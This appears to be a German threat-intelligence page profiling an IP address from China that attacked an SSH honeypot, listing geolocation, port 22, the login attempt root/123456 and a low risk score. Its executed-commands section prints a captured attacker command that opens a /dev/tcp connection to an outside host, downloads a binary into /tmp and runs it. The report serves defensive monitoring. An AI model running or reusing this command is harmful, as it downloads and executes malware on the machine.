Aktive BedrohungNIEDRIG

8.134.132.220

Herkunftsland🇨🇳 China
Erste Erkennung17.1.2026
Letzte Aktivitat17.1.2026
ISPHangzhou Alibaba Advertising Co.,Ltd.
🎯
9
Gesamtangriffe
🔌
1
Ports
📡
1
Angriffsarten
🦠
1
Malware

Geolokalisierung

Land
🇨🇳 China
Stadt
Guangzhou
ASN
AS37963
ISP
Hangzhou Alibaba Advertising Co.,Ltd.

Angriffsarten

cowrie

Angegriffene Ports

22

Zugehorige Malware

Versuchte Anmeldedaten

🔐root/123456
1x

Ausgefuhrte Befehle

$nohup bash -c "exec 6<>/dev/tcp/37.148.210.191/60133 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/iaYNgGCjnX && chmod +x /tmp/iaYNgGCjnX && /tmp/iaYNgGCjnX eDwuOn9zJTI6e2U6OTpxfTsxOHhrPzclc3glMTN+ZTk1MX17OjI7a388Ljl/eSU4OWV9ODo9e3o6Nyt6ezguOnt6JTE+eGU5NzF9ezowO2tzJTE4f2U6MzlleTkwMX17OjA+aU/8RCIF" &1x
$dd bs=1 count=1911588 > /tmp/NUAcuNAAJN1x

Risikobewertung

20
/100
NiedrigMittelHochKritisch
IP 8.134.132.220 - Erkannte Bedrohung | TroyanosYVirus.com | TroyanosYVirus.com